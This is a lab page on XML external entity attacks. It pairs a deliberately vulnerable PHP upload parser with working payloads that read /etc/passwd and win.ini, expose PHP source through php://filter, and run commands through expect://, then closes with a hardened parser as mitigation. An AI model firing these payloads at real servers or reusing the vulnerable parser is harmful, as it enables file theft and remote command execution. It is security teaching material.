
Lab - XML eXternal Entity Attack

Published: 2020-12-16 09:02:55 | Section: Encyclopedia | Source: compiled from the web

Prepare

Lab

Linux kali 3.14-kali1-686-pae

Requirements

# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5

Demo Code

<html>                       
<body>                       
<h1>Process XML</h1>         

<form action="" method="post" enctype="multipart/form-data">
    <label for="file">Archive XML:</label>        
    <input type="file" name="file" id="file">
    <input type="submit" name="submit" value="submit"><br />
</form>                      
<hr>                           
<h1>Results</h1>             
<?php
# error_reporting(E_ALL);
# ini_set("display_errors", 1);

if ( isset($_FILES["file"]) ) {
    // Deliberately vulnerable for the lab: the upload is parsed with DTD validation enabled
    $doc = new DOMDocument();
    $doc->validateOnParse = true;
    $doc->Load($_FILES["file"]["tmp_name"]);

    // Echo the text of every <data> element back to the page
    $tags = $doc->getElementsByTagName("data");
    foreach($tags as $tag) {
        echo "<pre>" . $tag->nodeValue . "</pre>\n";
    }
} else {
    echo "invalid xml format";
}
?>

</body>                      
</html>

Exploit


Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
<xxx>&message;</xxx>

Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
<somexml><message>&hello;</message></somexml>

Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>
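
Mitigation

A hardened counterpart to the Demo Code parser, added here as an example and not part of the original lab. The function name `extract_data_nodes` and the two sample documents are constructed for illustration; it assumes the upload format never needs a DTD.

```php
<?php
// Added example: hardened counterpart of the lab's DOMDocument parsing.
// The function name and the sample documents below are illustrative.

function extract_data_nodes(string $xml): array
{
    // PHP < 8.0 may be linked against libxml2 < 2.9, which resolves external
    // entities by default; switch the entity loader off there.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);   // keep parser errors out of the response

    $doc = new DOMDocument();
    // Do not set validateOnParse, resolveExternals or substituteEntities, and do
    // not pass LIBXML_NOENT or LIBXML_DTDLOAD. LIBXML_NONET blocks network fetches.
    $ok = $doc->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    if (!$ok) {
        throw new RuntimeException('malformed XML');
    }
    // Every payload in this lab declares its entity in a DOCTYPE, and the
    // upload format needs none, so reject any document that carries one.
    if ($doc->doctype !== null) {
        throw new RuntimeException('DOCTYPE not allowed');
    }
    $out = [];
    foreach ($doc->getElementsByTagName('data') as $tag) {
        // nodeValue is attacker-controlled text: escape it before echoing.
        $out[] = htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8');
    }
    return $out;
}

// Constructed sample inputs: one plain document, one carrying an internal DTD.
$benign   = '<?xml version="1.0"?><root><data>hello &lt;b&gt;</data></root>';
$with_dtd = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY e "x">]><r><data>&e;</data></r>';

foreach (['benign' => $benign, 'with_dtd' => $with_dtd] as $name => $xml) {
    try {
        echo $name, ': ', implode(', ', extract_data_nodes($xml)), PHP_EOL;
    } catch (RuntimeException $e) {
        echo $name, ': rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

In the upload handler, pass `file_get_contents($_FILES["file"]["tmp_name"])` to the function. `loadXML()` on a string keeps working when the entity loader is disabled, whereas `load()` on a path does not.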


(Editor: 李大同)
